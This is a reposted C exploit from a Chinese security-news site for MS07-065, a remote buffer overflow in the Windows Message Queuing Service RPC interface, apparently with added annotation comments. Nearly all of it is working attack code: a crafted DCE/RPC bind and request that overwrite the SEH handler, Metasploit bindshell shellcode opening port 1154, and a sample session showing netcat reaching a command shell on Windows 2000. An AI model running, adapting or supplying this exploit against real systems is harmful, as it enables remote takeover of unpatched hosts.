
MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)

2008-02-25  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org
 
  you need to know the DNS name of the target to trigger this vuln
  the service listens on port 2103/2105/2107
 
D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
--------------------------------------------------------------------------
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
--------------------------------------------------------------------------
 
[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!
 
D:\soft\develop\MyProjects\temp\Debug>
 
 
D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error



Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
 
C:\WINNT\system32>exit
exit
sent 5, rcvd 109: NOTSOCK
 
D:\>
 
 
*/
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <winsock.h>
#include <io.h>
#pragma comment(lib,"ws2_32")
 
// DCE/RPC bind PDU (ptype 0x0b) for the MSMQ RPC interface
//   UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0, NDR transfer syntax.
// Sent once in main() right after the TCP connect, before the request PDUs;
// the bind_ack (if any) is never read.
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,   // rpc_vers 5.0, ptype 0x0b bind, flags first|last, NDR data rep
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,   // frag_length 0x48 (72 = sizeof bind_str), auth_length 0, call_id 1
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,   // max_xmit_frag / max_recv_frag 0x16d0, assoc_group_id 0
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,   // one presentation context: ctx_id 0, one transfer syntax
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,   // abstract syntax UUID fdb3a030-065f-11d1- (little-endian fields)
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,   //   -bb9b-00a024ea5525
0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,   // interface version 1.0; transfer syntax 8a885d04-1ceb-
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,   //   -11c9-9fe8-08002b104860 (NDR)
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 }; //   transfer syntax version 2



 
 
// RPC Request  Opnum: 0x06
char request_1[] = {
0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00,  // target's dns name (unicode)
0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,



0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,     // \xeb\x06\x42\x42 jmpcode
0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,     //  overwrite seh ; call ebx
0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,     //  bindshell on port 1154, metasploit shellcode
0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
 
 
// Final fragment of the opnum-6 request: ptype 0x00 (request), flags 0x82 =
// PFC_LAST_FRAG | PFC_OBJECT_UUID, frag_length 0x118 (280 = sizeof request_2).
// main() sends it after request_1 and the 5104-byte 0x41 filler; the object
// UUID is the same MSMQ interface UUID carried in bind_str.
char request_2[] = {
0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,   // rpc_vers 5.0, ptype request, flags last|object_uuid, NDR data rep
0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,   // frag_length 0x0118, auth_length 0, call_id 1
0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,   // alloc_hint 0xf0, p_cont_id 0, opnum 6
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,   // object UUID fdb3a030-065f-11d1-bb9b-00a024ea5525
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,   // 27 rows = 216 bytes of 0x41 stub data
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,   // trailing 24 bytes of stub data
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
 
 
 
// Print the command-line synopsis to stdout and terminate with status 1.
// argv: the program name (argv[0] of the caller), echoed into the synopsis.
// Does not return.
void usage(char *argv) {
   const char *prog = argv;
   fprintf(stdout, " Usage:   %s -h 127.0.0.1 (Universal exploit)\n", prog);
   fprintf(stdout, "          %s -h host [-p port]\n", prog);
   fputs(" Targets:\n", stdout);   // no target table is ever listed here
   exit(1);
}
 
 
 
/************* TCP connect *************************/
 
void Disconnect(SOCKET s);
 
 
// Open a TCP connection to address:port, waiting at most `timeout` seconds
// for the handshake to complete. (Original attribution: "ripped from isno".)
//
// address: dotted-decimal IPv4 string, passed straight to inet_addr(); no
//          hostname resolution is done here
// port:    TCP port, truncated to 16 bits by the (short) cast below
// timeout: connect timeout in whole seconds
//
// Returns the connected socket (restored to blocking mode) on success, or a
// negative code: -1 socket() failed, -2 the address parsed to 0, -3 select()
// failed, -4 the timeout elapsed, -5 the socket reports a pending SO_ERROR.
//
// NOTE(review): SOCKET is an unsigned type in Winsock, so `s<0` below can
// never be true and a socket() failure (INVALID_SOCKET) is not detected.
// inet_addr() reports a malformed address as INADDR_NONE rather than 0, so
// the -2 path only fires for "0.0.0.0". main() also stores the result in a
// SOCKET and tests `s<0`, so the negative codes are not observable there.
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;
 
    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;
 
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons((short)port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);              // non-blocking, so connect() returns at once
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));   // return value not checked (WSAEWOULDBLOCK is the expected result)
    if((i=select(s+1,0,&wd,0,&tv))==(-1))    // wait for writability = handshake finished or failed; nfds is ignored by Winsock
    {
        closesocket(s);
        return -3;
    }
    if(i==0)                                  // nothing became writable before the timeout
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);   // writable does not mean connected: read the pending error
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);               // bf is 0 here, so this switches the socket back to blocking
    return s;
}
 
 
// Tear down the connection: close the socket, then unload Winsock.
// s: the connected socket returned by Make_Connection().
// WSACleanup() is called here, so no Winsock call may follow this function.
void Disconnect(SOCKET s)
{
         (void)closesocket(s);   // best-effort teardown; result not inspected
         (void)WSACleanup();
}
 
/****************************************************/
 
 
 
// Entry point: parse `-h <ip> [-p <port>]`, connect, send the three RPC PDUs
// defined above in order (bind_str, request_1, 5104 bytes of 0x41 filler,
// request_2), read and discard whatever comes back, and disconnect.
// Returns 0; every failure path calls exit(1) (directly or via usage()).
int main(int argc, char * argv[]){
 
   unsigned char * target = NULL;   // value of -h; stays NULL if -h is never given, so inet_addr(NULL) is reached below
   int port = 2103;                 // default MSMQ RPC port (the header comment lists 2103/2105/2107)
   int i;
 
   int  ret;                        // recv() result; assigned but never inspected
   char buffer[6000] = {0};         // 0x41 filler to send, later reused as the receive buffer
   SOCKET  s;
   WSADATA WSAData;
 
   printf("--------------------------------------------------------------------------\n");
   printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
   printf("-== code by axis@ph4nt0m ==-\n");
   printf("-== Http://www.ph4nt0m.org ==-\n");
   printf("-== Tested against Windows 2000 server SP4 ==-\n");
   printf("--------------------------------------------------------------------------\n\n");
 
 
    if (argc==1) usage(argv[0]); //Handle parameters
     // Each flag consumes the following argv slot (the i++ at the bottom of
     // the loop). NOTE(review): argv[i+1] is read without checking i+1 < argc,
     // so a trailing "-h" or "-p" dereferences argv[argc], which is NULL.
     for(i=1;i<argc;i++) {
      if ( (argv[i][0]=='-') ) {
         switch (argv[i][1]) {
         case 'h':
            target=(unsigned char *)argv[i+1];
            break;
         case 'p':
            // "-p 2103" only prints the banner and leaves `port` at its
            // default; any other value goes through atoi() unvalidated.
            if (strcmp(argv[i+1],"2103")==0) {
               printf("[+] Attacking default port 2103\n");
            } else {
               port=atoi(argv[i+1]);
            }
            break;            
         default:
            printf("[-] Invalid argument: %s\n",argv[i]);
            usage(argv[0]);
            break;
         }
         i++;            // skip the flag's value
           } else usage(argv[0]);
          }
 
/********************** attack payload ***************************/
                    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)   // requests Winsock 1.1
                    {
            fprintf(stderr, "[-] WSAStartup failed.\n");
            WSACleanup();
            exit(1);
                    }
 
 
                    //Sleep(1200);
 
 
         s = Make_Connection((char *)target, port, 10);   // 10-second connect timeout
         // NOTE(review): s is a SOCKET (unsigned in Winsock), so `s<0` is never
         // true; Make_Connection's negative error codes are not caught here and
         // a failed connect falls through to the send() calls below.
         if(s<0)
                    {
            fprintf(stderr, "[-] connect err.\n");
            exit(1);
                    }
 
                   //Send our evil Payload
        printf("[*]Sending our Payload, Good Luck! ^_^\n");
 
                   // 1. DCE/RPC bind to the MSMQ interface UUID; the bind_ack is never read.
                   printf("[*]Sending RPC Bind String!\n");
                   send(s, bind_str, sizeof(bind_str), 0);
 
                   Sleep(1000);   // presumably lets the bind settle before the request arrives
                 
                   // 2. request_1, then 5104 bytes of 0x41 from `buffer`, then request_2.
                   //    None of the send() return values are checked.
                   printf("[*]Sending RPC Request Now!\n");
                   memset(buffer, '\x41', sizeof(buffer));  // fill the buffer to trigger seh
    send(s, request_1, sizeof(request_1), 0);
                   send(s, buffer, 5104, 0);   // fill the buffer to trigger seh
                   send(s, request_2, sizeof(request_2), 0);
                 
 
        Sleep(100);
 
             // 3. Drain any reply; sizeof(buffer)-1 keeps the last byte zero so the
             //    commented-out "%s" print below would stay NUL-terminated.
             memset(buffer, 0, sizeof(buffer));
             ret = recv(s, buffer, sizeof(buffer)-1, 0);
                   //printf("recv: %s\n", buffer);
 
                   Disconnect(s);   // closesocket() + WSACleanup()
 
                   return 0;
}